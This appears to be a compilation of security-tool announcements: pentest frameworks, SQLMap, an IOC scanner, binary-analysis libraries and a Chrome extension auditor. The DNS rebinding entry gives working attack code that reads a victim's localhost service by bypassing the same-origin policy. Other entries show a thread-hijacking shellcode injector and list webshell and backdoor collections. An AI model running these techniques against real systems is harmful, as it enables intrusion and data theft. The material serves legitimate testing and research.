  • Working on Kali, Ubuntu, Arch, Fedora, openSUSE and Windows (Cygwin)
  • Some bugs that I'm fixing over time, so don't worry about them.



Check the Wiki Pages to know more about the tool





Overview
LockDoor is a framework aimed at helping penetration testers, bug bounty hunters and cyber security engineers. It is designed for Debian/Ubuntu/ArchLinux-based distributions to create a familiar, penetration-testing-oriented environment containing the favorite and most used tools of pentesters. As pentesters, most of us have a personal '/pentest/' directory, and this framework helps you build a perfect one. On top of all that, it automates the pentesting process to help you do the job more quickly and easily.


Features
Added value : (what makes it different from other frameworks).

Pentesting Tools Selection:
  • Tools?: Lockdoor doesn't contain all pentesting tools (Added value). Let's be honest: who has ever used all the tools found on those penetration testing distributions? Lockdoor contains only the favorite (Added value) and most used tools by pentesters (Added value).
  • What tools?: the tools Lockdoor contains are a collection of the best tools (Added value) from Kali, Parrot OS and BlackArch, plus some private tools (Added value) from other hacking teams (Added value) like InurlBr and iran-cyber, without forgetting some cool and amazing tools I found on GitHub made by some perfect human beings (Added value).
  • Easy customization: easily add/remove tools. (Added value)
  • Installation: you can install the tool automatically using installer.sh, manually, or on Docker [COMING SOON]

Resources and cheatsheets: (Added value)
  • Resources: that's what gives Lockdoor its added value. Lockdoor doesn't contain only tools! It also ships Pentesting and Security Assessment Findings Report templates (Added value), pentesting walkthrough examples and templates (Added value) and more.
  • Cheatsheets: everyone can forget something during a process or a tool's usage, or even some tricks. Here come the Cheatsheets (Added value)! There are cheatsheets about everything: every tool in the framework and all enumeration, exploitation and post-exploitation techniques.

Installation:
  • Automatically
    git clone https://github.com/SofianeHamlaoui/Lockdoor-Framework.git && cd Lockdoor-Framework
    chmod +x ./install.sh
    ./install.sh
  • Manually
    • Installing requirements
      python python-pip python-requests python2 python2-pip gcc ruby php git wget bc curl netcat subversion jre-openjdk make automake gcc linux-headers gzip
    • Installing Go
      wget https://dl.google.com/go/go1.13.linux-amd64.tar.gz
      tar -xvf go1.13.linux-amd64.tar.gz
      sudo mv go /usr/local
      export GOROOT=/usr/local/go
      export GOPATH=$HOME/go
      export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
      rm go1.13.linux-amd64.tar.gz
    • Installing Lockdoor
      # Cloning
      git clone https://github.com/SofianeHamlaoui/Lockdoor-Framework.git && cd Lockdoor-Framework
      # Create the config file
      # INSTALLDIR = where you want to install Lockdoor (Ex : /opt/sofiane/pentest)
      echo "Location:$INSTALLDIR" > "$HOME/.config/lockdoor/lockdoor.conf"
      # Moving the resources folder
      mv ToolsResources/* "$INSTALLDIR"
      # Installing Lockdoor from PyPi
      pip3 install lockdoor
  • Docker Installation
    COMING SOON

Lockdoor Tools contents:

Information Gathering:
  • Tools:
    • dirsearch : A Web path scanner
    • brut3k1t : security-oriented bruteforce framework
    • gobuster : DNS and VHost busting tool written in Go
    • Enyx : an SNMP IPv6 Enumeration Tool
    • Goohak : Launchs Google Hacking Queries Against A Target Domain
    • Nasnum : The NAS Enumerator
    • Sublist3r : Fast subdomains enumeration tool for penetration testers
    • wafw00f : identify and fingerprint Web Application Firewall
    • Photon : incredibly fast crawler designed for OSINT.
    • Raccoon : offensive security tool for reconnaissance and vulnerability scanning
    • DnsRecon : DNS Enumeration Script
    • Nmap : The famous security Scanner, Port Scanner, & Network Exploration Tool
    • sherlock : Find usernames across social networks
    • snmpwn : An SNMPv3 User Enumerator and Attack tool
    • Striker : an offensive information and vulnerability scanner.
    • theHarvester : E-mails, subdomains and names Harvester
    • URLextractor : Information gathering & website reconnaissance
    • denumerator.py : Enumerates list of subdomains
    • other : other information gathering, recon and enumeration scripts I collected somewhere.
  • Frameworks:
    • ReconDog : Reconnaissance Swiss Army Knife
    • RED_HAWK : All in one tool for Information Gathering, Vulnerability Scanning and Crawling
    • Dracnmap : Info Gathering Framework

Web Hacking:
  • Tools:
    • Spaghetti : Web Application Security Scanner
    • CMSmap : CMS scanner
    • BruteXSS : BruteXSS is a tool to find XSS vulnerabilities in web application
    • J-dorker : Website List grabber from Bing
    • droopescan : a plugin-based scanner to identify several CMSs, mainly Drupal and SilverStripe.
    • Optiva : Web Application Scanner
    • V3n0M : Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
    • AtScan : Advanced dork Search & Mass Exploit Scanner
    • WPSeku : Wordpress Security Scanner
    • Wpscan : A simple Wordpress scanner written in python
    • XSStrike : Most advanced XSS scanner.
    • Sqlmap : automatic SQL injection and database takeover tool
    • WhatWeb : the Next generation web scanner
    • joomscan : Joomla Vulnerability Scanner Project
  • Frameworks:
    • Dzjecter : Server checking Tool

Privilege Escalation:
  • Tools:
    • Linux:
      • Scripts:
        • linux_checksec.sh
        • linux_enum.sh
        • linux_gather_files.sh
        • linux_kernel_exploiter.pl
        • linux_privesc.py
        • linux_privesc.sh
        • linux_security_test
      • Linux_exploits folder
    • Windows :
      • windows-privesc-check.py
      • windows-privesc-check.exe
    • MySql:
      • raptor_udf.c
      • raptor_udf2.c

Reverse Engineering:
  • Radare2 : unix-like reverse engineering framework
  • VirusTotal : VirusTotal tools
  • Miasm : Reverse engineering framework
  • Mirror : reverses the bytes of a file
  • DnSpy : .NET debugger and assembly editor
  • AngrIo : A python framework for analyzing binaries ( Suggested by @Hamz-a )
  • DLLRunner : a smart DLL execution script for malware analysis in sandbox systems.
  • Fuzzy Server : a Program That Uses Pre-Made Spike Scripts to Attack VulnServer.
  • yara : a tool aimed at helping malware researchers to identify and classify malware samples
  • Spike : a protocol fuzzer creation kit + audits
  • other : other scripts collected somewhere

Exploitation:
  • Findsploit : Find exploits in local and online databases instantly
  • Pompem : Exploit and Vulnerability Finder
  • rfix : Python tool that helps RFI exploitation.
  • InUrlBr : Advanced search in search engines
  • Burpsuite : Burp Suite for security testing & scanning.
  • linux-exploit-suggester2 : Next-Generation Linux Kernel Exploit Suggester
  • other : other scripts I collected somewhere.

Shells:
  • WebShells : BlackArch's Webshells Collection
  • ShellSum : A defense tool - detect web shells in local directories
  • Weevely : Weaponized web shell
  • python-pty-shells : Python PTY backdoors

Password Attacks:
  • crunch : a wordlist generator
  • CeWL : a Custom Word List Generator
  • patator : a multi-purpose brute-forcer, with a modular design and a flexible usage

Encryption - Decryption:
  • Codetective : a tool to determine the crypto/encoding algorithm used
  • findmyhash : Python script to crack hashes using online services

Social Engineering:
  • scythe : an accounts enumerator

Lockdoor Resources contents:

Information Gathering:

Crypto:

Exploitation:

Networking:

Password Attacks:

Post Exploitation:

Privilege Escalation:

Pentesting & Security Assessment Findings Report Templates:

Reverse Engineering:

Social Engineering:

Walk Throughs:

Web Hacking:

Other:

Contributing
  1. Fork it ( https://github.com/SofianeHamlaoui/Lockdoor-Framework/fork )
  2. Create your feature branch
  3. Commit your changes
  4. Push to the branch
  5. Create a new Pull Request



GiveMeSecrets - Use Regular Expressions To Get Sensitive Information From A Given Repository (GitHub, Pip Or Npm)

Use regular expressions to get sensitive information from a given repository (GitHub, pip or npm).

Dependencies
You only need Python 3.6 or higher to launch this script. In addition, git, pip and npm must be installed on the system.

How to use
It's very easy to use: just run the script and pass the option (1 - GitHub; 2 - pip; 3 - npm) and the repository. Example:
python3 give_me_secrets.py --option 1 --repo https://github.com/Josue87/BoomER.git   
Spanish post in Boomernix.com

Author
Josué Encinar @JosueEncinar


SQLMap v1.3.10 - Automatic SQL Injection And Database Takeover Tool


SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.
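For instance, a minimal first run against a placeholder URL (--batch accepts the default answers, --dbs enumerates the databases) might look like:

python sqlmap.py -u "http://target.example/page.php?id=1" --batch --dbs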

Demo

Links

Translations


ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shellcode Into A Standard Win32 Application


Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.

With Thread Hijacking, the hijacker.exe program can suspend a thread within the target.exe program, allowing us to write shellcode to that thread.

Usage
int main()
{
    System sys;
    Interceptor incp;
    Exception exp;

    sys.returnVersionState();

    // Adjust token privileges before touching another process
    if (sys.returnPrivilegeEscalationState())
    {
        std::cout << "Token Privileges Adjusted\n";
    }

    // Find the target Win32 process (m_win32ProcessName is defined elsewhere
    // in the project) and inject the shellcode into one of its threads
    if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
    {
        incp.ExecuteWin32Shellcode(m_procId);
    }

    system("PAUSE");
    return 0;
}

Environment
  • Windows Vista+
  • Visual C++

Libs
  • Winapi
    • user32.dll
    • kernel32.dll
  • ntdll.dll


ManaTI - A Web-Based Tool To Assist The Work Of The Intuitive Threat Analysts


Machine Learning for Threat Intuitive Analysis
The goal of the ManaTI project is to develop machine learning techniques to assist an intuitive threat analyst and speed up the discovery of new security problems. The machine learning will contribute to the analysis by finding new relationships and inferences. The project includes the development of a web interface for the analyst to interact with the data and the machine learning output.
This project is partially supported by Cisco Systems. For more information about the project please go to Stratosphere Lab page.

Stable Versions
  • Mon Sep 3 12:24:26 CEST 2018: Version 0.12.0a
  • Sun Aug 12 16:21:19 CEST 2018: Version 0.11.0a
  • Mon Jan 29 00:07:15 CEST 2018: Version 0.9.0a
  • Fri Nov 10 19:16:52 CEST 2017: Version 0.8.0.537a
  • Fri Mar 31 12:19:00 CEST 2017: Version 0.7.1
  • Sun Mar 5 00:04:41 CEST 2017: Version 0.7
  • Thu Nov 10 12:30:45 CEST 2016: Version 0.6.2.1
  • Wed Oct 12 21:19:21 CEST 2016: Version 0.5.1
  • Wed Sep 21 17:56:40 CEST 2016: Version 0.41
  • Tue Sep 13 10:52:36 CEST 2016: Version 0.4
  • Thu Aug 18 15:44:31 CEST 2016: Version 0.3
  • Wed Jun 29 10:44:15 CEST 2016: Version 0.2

Authors

Installation
ManaTI is a Django project with a Postgres database that works on Linux and macOS. We recommend using a virtualenv environment to set it up. The installation steps for Linux are:
    sudo apt-get update ; sudo apt-get upgrade -y
  1. Clone the repository:
        git clone git@github.com:stratosphereips/Manati.git; cd Manati
     or, if you don't want to use SSH, use HTTPS:
        git clone https://github.com/stratosphereips/Manati.git; cd Manati
  2. Install Virtualenv to isolate the required python libraries for ManaTI (the python libraries for development will be installed as well):
        sudo apt-get install virtualenv python-pip python-dev libpq-dev build-essential libssl-dev libffi-dev
  3. Create the virtualenv folder:
        virtualenv .vmanati
  4. Activate Virtualenv:
        source .vmanati/bin/activate
  5. Install the PostgreSQL DB engine:
        sudo apt-get install postgresql-server-dev-all postgresql-9.5 postgresql-client-9.5
  6. Create the environment variable files. Copy and rename .env.example to .env, and .env-docker.example to .env-docker:
        cp .env.example .env
        cp .env-docker.example .env-docker
     OPTIONAL: you can modify the password and name of the database if you want. Remember to reflect the changes in the Postgres database settings below.
  7. Install the required python libraries:
        pip install -r requirements/local.txt
     If you run into permission issues with the ~/.cache folder, the following command solves them:
        sudo chmod 777 ~/.cache
     If you deploy to Amazon AWS EC2 and you get a memory error, try:
        pip install -r requirements/local.txt --no-cache-dir
  8. Start postgresql:
        sudo /etc/init.d/postgresql start

  Configure the database
  9. As root (there should be a user postgres after installing the database):
        su - postgres
  10. Create the database:
        psql
        create user manati_db_user with password 'password';
        create database manati_db;
        grant all privileges on database manati_db to manati_db_user;
        alter role manati_db_user createrole createdb;
        CTRL-D (to exit the postgres db shell)
      OPTIONAL: you can change the default password of the postgres user (reusing the same password is fine), which is especially useful if you want to use pgAdmin 3/4 as a postgres client. Remember not to exit the 'su - postgres' session:
        psql
        \password
        CTRL-D (to exit the postgres db shell)

  Verify that the db was created successfully
  11. As the postgres user (enter the password when prompted; after that you should be logged into postgres):
        psql -h localhost -d manati_db -U manati_db_user
  12. Install redis-server:
        sudo apt-get install redis-server
      OPTIONAL: you can configure Redis further, for example to set a password:
        sudo vi /etc/redis/redis.conf
      Find the requirepass line and write the password you want next to it:
        requirepass passwodUser
      Just remember to update the REDIS_PASSWORD environment variable in the .env file at the root of the project.
  13. Run the migration files:
        python ./manage.py makemigrations guardian
        python ./manage.py migrate
  14. Register external modules. You must run this command every time you add or remove an External Module:
        python ./manage.py check_external_modules
  15. Execute the redis_worker.sh file (in the background with '&' or in another console):
        ./utility/redis_worker.sh
  16. Create a superuser to log in to the web system if you need one:
        python manage.py createsuperuser

  How to run it
  It is not recommended to run the server as root, but since only root can open port numbers below 1024, it is up to you which user to use. By default it opens port 8000, so you can run it as a regular user:
        python ./manage.py runserver
  After this, just open your browser at http://localhost:8000/manati_project/manati_ui
  If you want to expose the server on the network, you can do it with:
        python ./manage.py runserver <ip-address>:8000
If you want to see the jobs running or enqueued go to http://localhost:8000/manati_project/django-rq/

Settings: Updating version from master
  1. Open the project directory:
        cd path/to/project_directory
  2. Pull the latest changes from master:
        git pull origin master
  3. Install the latest libraries:
        pip install -r requirements/local.txt
  4. Install redis-server and execute the redis_worker.sh file (in the background with '&' or in another console):
        ./utility/redis_worker.sh
  5. Prepare the migration files for the guardian library (if they already exist, nothing happens):
        python ./manage.py makemigrations guardian --noinput
  6. Execute the migration files:
        python ./manage.py migrate --noinput
  7. Register external modules. You must run this command every time you add or remove an External Module:
        python ./manage.py check_external_modules
  8. Run the server:
        python ./manage.py runserver

Run in production
Using supervisor and gunicorn as the server, with an RQ worker (backed by a redis server) to handle background tasks. In the future we plan to prepare settings for nginx.
cd path/to/project_directory 
python manage.py collectstatic --noinput --clear
sudo supervisord -c supervisor-manati.conf -n

Docker image
If you have docker installed, it may be a good idea to install the ManaTI docker image. The Dockerfile and server configuration files are here. This ManaTI docker image runs on an NGINX server with uWSGI. The image is maintained by @Piuliss.
docker pull honeyjack/manati:latest
docker run --name manati -p 8888:8888 -dti honeyjack/manati:latest bash
Then, wait for 5 or 10 seconds and go to http://localhost:8888

Docker Compose
If you don't want to spend time installing ManaTI and you have docker installed, you can just use docker-compose. First clone the repository and go to the project directory.
cd Manati
cp .env.example .env
cp .env-docker.example .env-docker
docker-compose build
docker-compose run web bash -c "python manage.py makemigrations --noinput; python manage.py migrate; python manage.py check_external_modules"
docker-compose run web bash -c "python manage.py createsuperuser2 --username admin --password Password123 --noinput --email 'admin@manatiproject.com'"
docker-compose up # or 'docker-compose up -d' if you don't want to see the logs in the console.
After this, just open your browser at http://localhost:8000/manati_project/manati_ui/new

Backup DB
pg_dump -U manati_db_user -W -F p manati_db > backup.sql # plain text

Restore DB
psql manati_db -f backup.sql -U manati_db_user



Fenrir - Simple Bash IOC Scanner


Fenrir is a simple IOC scanner bash script. It allows scanning Linux/Unix/OSX systems for the following Indicators of Compromise (IOCs):
  • Hashes
    MD5, SHA1 and SHA256 (using md5sum, sha1sum, shasum -a 256)
  • File Names
    string - checked for substring of the full path, e.g. "temp/p.exe" in "/var/temp/p.exe"
  • Strings
    grep in files
  • C2 Server
    checking for C2 server strings in 'lsof -i' and 'lsof -i -n' output
  • Hot Time Frame
    using stat in different modes - define min and max epoch time stamp and get all files that have been created in between
Basic characteristics:
  • Bash Script
  • No installation or agent needed
  • Uses common tools to extract attributes (e.g. md5sum, grep, stat in different modes)
  • Intended to run on any Linux / Unix / OS X with Bash
  • Low footprint - Ansible playbook with RAM drive solution
  • Smart exclusions (file size, extension, certain directories) speeds up the scan process

Why Fenrir?
FENRIR is the third tool after THOR and LOKI. THOR is our full-featured APT scanner with many modules and export types for corporate customers. LOKI is a free and open IOC scanner that uses YARA as its signature format.
The problem with both predecessors is that they have certain requirements on the Linux platform. We build THOR for a certain Linux version in order to match the correct libc that is required by the YARA module. LOKI requires Python and YARA to be installed on Linux to run.
We faced the problem of checking more than 100 different Linux systems for certain Indicators of Compromise (IOCs) without installing an agent or software packages. We already had an Ansible playbook for the distribution of THOR on a defined set of Linux remote systems. This playbook creates a RAM drive on the remote system, copies the local program binary to the remote system, runs it and retrieves the logs afterwards. This ensures that the program's footprint on the remote system is minimal. I adapted the Ansible playbook for Fenrir (it is still untested).
Fenrir is still in 'testing'. Please report errors (and solutions) via the "Issues" section here on GitHub.
If you find a better / more solid / less error-prone solution for the evaluations in the script, please report it back. I am not a full-time bash programmer, so I'd expect some room for improvement.

Usage
Usage: ./fenrir.sh DIRECTORY

DIRECTORY - Start point of the recursive scan
All settings can be configured in the header of the script.


Step by Step
What Fenrir does is:
  • Reads the IOC files
  • Takes a parameter as starting directory for the recursive walk
  • Checks C2 servers in lsof output
  • Checks for directory exclusions (configurable in the script header)
  • Checks for certain file extensions to check (configurable in the script header)
  • Checks the file name (full path) for matches in IOC files
  • Checks for file size exclusions (configurable in the script header)
  • Checks for certain strings in the file (via grep)
  • Checks for certain hash values
  • Checks for change/creation time stamp
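Fenrir itself is pure bash; as an illustration of what the hash-check step boils down to, here is a minimal Python sketch (the IOC file name and one-hash-per-line format are assumptions for the example, not Fenrir's actual code):
import hashlib, os, sys

# Illustrative sketch of a hash-IOC check; Fenrir itself is a bash script.
# Assumes hash-iocs.txt holds one lowercase MD5 hash per line (assumed format).
def load_hash_iocs(path="hash-iocs.txt"):
    with open(path) as f:
        return {line.strip().lower() for line in f if line.strip()}

def scan(root, iocs):
    for dirpath, _, files in os.walk(root):
        for name in files:
            fpath = os.path.join(dirpath, name)
            try:
                with open(fpath, "rb") as fh:
                    digest = hashlib.md5(fh.read()).hexdigest()
            except OSError:
                continue  # skip unreadable files, like an exclusion
            if digest in iocs:
                print("[!] Hash match: {} ({})".format(fpath, digest))

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".", load_hash_iocs())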

Screenshots
Scan Run showing the different match types on a demo directory.


Detect C2 connections


Detect strings in GZIP packed log files


Configuration


Ansible Playbook


Stat issue (regarding the CREATED file stamp on Linux file systems)


Contact
via Twitter @Cyb3rOps


DNS Rebinding Tool - DNS Rebind Tool With Custom Scripts



Inspired by @tavisio
This project is meant to be an all-in-one toolkit to test further DNS rebinding attacks, and my take on understanding these kinds of attacks. It consists of a web server and a pseudo DNS server that only responds to A queries.

The root index of the web server allows you to configure and run the attack with a rudimentary web GUI. See dnsrebindtool.43z.one.
A basic nginx config to host the web server
server {
    listen 80;
    server_name dnsrebindtool.43z.one;

    location / {
        proxy_pass http://localhost:5000;
    }
}
The /attack route of the web server reads the GET parameter script, which should contain base64-encoded JavaScript, and responds with the decoded code (wrapped in a setTimeout) embedded in a regular HTML page.
% curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk=" 
<html>
<script>

setTimeout(function(){
alert(1)
}, 3000)

</script>
</html>
Within my registrar for the domain 43z.one, I set up an NS record for the subdomain rebind to point to the IP where this tool is hosted.
ns       A   81.4.124.10
rebind NS ns.43z.one
The DNS server responds only to A queries in this format
evcmxfm4g . 81-4-124-10 . 127-0-0-1 .rebind.43z.one
The first part (the subdomain) is just a random id and should be generated for every attack session (the web GUI does this on every reload). Second comes the IP the DNS server should respond with for the next 2 seconds, and third the IP the server should respond with after that time has passed.
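To make the timing logic concrete, here is a minimal Python sketch of the decision such a resolver has to make (illustrative only, not the tool's actual code; the 2-second window and name format follow the description above):
import re, time

# Illustrative sketch, not the tool's actual code.
# Name format: <session-id>.<ip1-with-dashes>.<ip2-with-dashes>.rebind.43z.one
first_seen = {}  # session id -> timestamp of the first query

def answer_for(qname, window=2.0):
    m = re.match(r'^([^.]+)\.(\d+-\d+-\d+-\d+)\.(\d+-\d+-\d+-\d+)\.rebind\.', qname)
    if not m:
        return None
    session = m.group(1)
    ip1 = m.group(2).replace('-', '.')
    ip2 = m.group(3).replace('-', '.')
    first = first_seen.setdefault(session, time.time())
    # Serve ip1 for the first `window` seconds, then switch to ip2.
    return ip1 if time.time() - first < window else ip2

print(answer_for('evcmxfm4g.81-4-124-10.127-0-0-1.rebind.43z.one'))  # 81.4.124.10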
$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one 
Fri Feb 2 21:18:20 CET 2018
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 81.4.124.10

$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Fri Feb 2 21:18:23 CET 2018
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 127.0.0.1
The last missing piece is an nginx config for the rebind domains. Only the /attack route should be passed to the tool; all other routes should respond with an error. This makes it possible to attack other services on port 80 with all routes except /attack (like /api/monitoring/stats, an endpoint my router exposes).
server {
    listen 80;
    server_name *.rebind.43z.one;

    location / {
        return 404;
    }

    location /attack {
        proxy_pass http://localhost:5000/attack;
    }
}
DNS Cache Eviction
var xhr = new XMLHttpRequest()
xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// first time the browser sees this domain it queries the dns server
// and gets 81.4.124.10

// sleep for more than 2 sec

xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// still uses 81.4.124.10 (AND NOT 127.0.0.1)
// NO dns query happened browser used cached IP
This is a problem for this kind of attack. In order for it to work, the browser has to issue a new DNS query to get the second IP. In theory, if you just wait long enough between the requests, a new query should happen. My tests show, though, that there is a faster but more aggressive approach. It is quite likely that this is setup-specific and needs more testing. I used the following script to measure the optimum value for the WAIT variable. Tested on Chromium 62.0.3202.89 running on Debian buster/sid.
var WAIT = 200
var start = Date.now()

var interval = setInterval(function(){
    var xhr = new XMLHttpRequest()
    xhr.open('GET', '//' + $REBIND_DOMAIN, false)

    xhr.send()

    if(xhr.status == 200){
        document.body.innerHTML = (Date.now() - start)/1000
        document.body.innerHTML += xhr.responseText
        clearInterval(interval)
        return
    }
}, WAIT)
WAIT value in ms    requests chrome sends    time until chrome queries dns again
0                   700                      60
10                  700                      60
100                 600                      63
120                 500                      63
150                 400                      63
180                 400                      75
200                 300                      63
220                 300                      69
250                 300                      78
280                 300                      87
300                 200                      63
320                 200                      67
340                 200                      71
360                 200                      75
380                 200                      79
400                 200                      83
1000                100                      103
I started a new repo just to explore this: dns cache eviction tester.
Putting it all together and testing it.
echo -e "HTTP/1.1 200 OK\n\n TOPSECRET" | sudo nc -lvp 80 -q1 127.0.0.1
This netcat instance serves some content I would like to get access to. I keep the default rebind domain
$RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one and default script
var start = Date.now()

var interval = setInterval(function(){
    var xhr = new XMLHttpRequest()
    xhr.open('GET', '//' + $REBIND_DOMAIN, false)

    xhr.send()

    if(xhr.status == 200){
        document.body.innerHTML = (Date.now() - start)/1000
        document.body.innerHTML += xhr.responseText
        clearInterval(interval)
        return
    }
}, 200)
on dnsrebindtool.43z.one and hit the Attack button. Open the dev tools network tab to see what is happening in the background. For me, after about 60 seconds the iframe fills up with the string TOPSECRET and the time it took. DNS rebinding circumvented the SOP. To get the breached data out of the iframe, one could use window.postMessage() or include code that forwards the data to another attacker server within the script itself.


Userrecon-Py v2.0 - Username Recognition On Various Websites


Username recognition on various websites.

Installation

With pip3
# Linux
sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
userrecon-py --help

Build from source
# Linux
git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
sudo -H pip3 install -r requirements.txt
python3 setup.py build
sudo python3 setup.py install

Usage
Start by printing the available actions by running userrecon-py --help. Then you can perform the following tests:
# print all results.
userrecon-py target decoxviii --all -o test


# print positive results.
userrecon-py target decoxviii --positive -o test


# print negative results.
userrecon-py target decoxviii --negative -o test

decoxviii
MIT



B2R2 - Collection Of Useful Algorithms, Functions, And Tools For Binary Analysis


B2R2 is a collection of useful algorithms, functions, and tools for binary analysis, written purely in F# (in .NET lingo, it is purely managed code). B2R2 is named after R2-D2, the famous fictional robot from Star Wars. In fact, B2R2's original name was B2-R2, but we decided to use the name B2R2 instead, because .NET does not allow dash (-) characters in identifiers (or namespaces). The name essentially represents "binary" or "two": "binary" itself means "two" states anyway. "B" and "2" mean "binary", and "R" indicates reversing.

B2R2?
  1. B2R2 is analysis-friendly: it is written in F#, which provides all the syntactic goodies for writing program analyzers, such as pattern matching and algebraic data types.
  2. B2R2 is fast: it has a fast and efficient front-end engine for binary analysis, which is written in a purely functional way. Therefore, it naturally supports pure parallelism for binary disassembling, lifting and IR optimization.
  3. B2R2 is easy to play with: there is absolutely no dependency hell for B2R2 because it is a fully-managed library. All you need to do is to install the .NET Core SDK, and you are ready to go! Native IntelliSense support is another plus!
  4. B2R2 is OS-independent: it works on Linux, macOS, Windows, and so on, as long as .NET Core supports it.
  5. B2R2 is interoperable: it is not bound to a specific language. Theoretically, you can use B2R2 APIs from any CLI-supported language.

Features?
Currently, our focus is on the front-end of binary analysis, which includes the binary parser, lifter, and optimizer. B2R2 natively supports parallel lifting, which is a new technique we introduced at NDSS BAR 2019. Please refer to our paper for more details about the technique as well as our design decisions. We also have our own back-end tools such as a symbolic executor, but we are not planning to open-source them yet. Nevertheless, B2R2 includes several useful middle-end and back-end features such as ROP chain compilation, CFG building, and automatic graph drawing. B2R2 also comes with a simple command-line utility that we call BinExplorer, which can help explore such features using a simple command-line interface.

Dependencies?
B2R2 relies on a tiny set of external .NET libraries, and our design principle is to use a minimum number of libraries. Below is a list of libraries that we leverage.

API Documentation
We currently use docfx to generate our documentation: https://b2r2.org/APIDoc/

Example
Let's try to use B2R2 APIs.
  1. First we create an empty directory DIRNAME:
    mkdir DIRNAME
  2. We then create an empty console project with dotnet command line:
    $ dotnet new console -lang F#
  3. Add our nuget package B2R2.FrontEnd to the project:
    $ dotnet add package B2R2.FrontEnd
  4. Modify the Program.fs file with your favorite editor as follows:
    open B2R2
    open B2R2.FrontEnd

    [<EntryPoint>]
    let main argv =
      let isa = ISA.OfString "amd64"
      let bytes = [| 0x65uy; 0xffuy; 0x15uy; 0x10uy; 0x00uy; 0x00uy; 0x00uy |]
      let handler = BinHandler.Init (isa, bytes)
      let ins = BinHandler.ParseInstr handler 0UL
      ins.Translate handler.TranslationContext |> printfn "%A"
      0
  5. We then just run it by typing: dotnet run. You will be able to see the lifted IR statements in your console. That's it! You just lifted an Intel instruction with only a few lines of F# code!

Build
Building B2R2 is fun and easy. All you need to do is to install .NET Core SDK 3.0 or above. Yea, that's it!
  • To build B2R2 in release mode, type make release or dotnet build -c Release in the source root.
  • To build B2R2 in debug mode, type make, or dotnet build in the source root.
For your information, please visit the official web site of F# to get more tips about installing the development environment for F#: http://fsharp.org/.

Why Reinventing the Wheel?
There are many other great tools available, but we wanted to build a functional-first binary analysis platform that is painless to install and runs on any platform without any hassle. B2R2 is in its infancy, but we believe it provides a rich set of library functions for binary analysis. It also has a strong front-end that is easily adaptable and extensible! Currently it reliably supports x86 and x86-64, meaning that we have heavily tested them; and it partially supports ARMv7 (and Thumb), ARMv8, MIPS32, and MIPS64, meaning that they work, but we haven't tested them thoroughly yet.

Features to be Added?
Below is a list of features that we plan to add in the future; the list is by no means complete. Some of them are works in progress, but we look forward to your contributions! Feel free to write a PR (Pull Request), making sure that you have read our contribution guideline.
  • Implement CFG recovery algorithms.
  • Implement assembler for currently supported ISAs using a parser combinator.
  • Support for floating point operations.
  • Support for more architectures such as PPC.

Credits
Members in SoftSec Lab. @ KAIST developed B2R2 in collaboration with Cyber Security Research Center (CSRC) at KAIST. See Authors for the full list.


Tarnish - A Chrome Extension Static Analysis Tool To Help Aide In Security Reviews


tarnish is a static-analysis tool to aid researchers in security reviews of Chrome extensions. It automates much of the regular grunt work and helps you quickly identify potential security vulnerabilities. This tool accompanies the research blog post which can be found here. If you don't want to go through the trouble of setting this up you can just use the tool at https://thehackerblog.com/tarnish/.

Unpolished Notice & Notes
It should be noted that this is an un-polished release. This is the same source as the deployment located at https://thehackerblog.com/tarnish/. In the future I may clean this up and make it much easier to run but I don't have time right now.
To set this up you'll need to understand how to:
  • Configure an S3 bucket
  • (if using auto-scaling) Set up ElasticBeanstalk
  • Use docker-compose
  • Set up redis
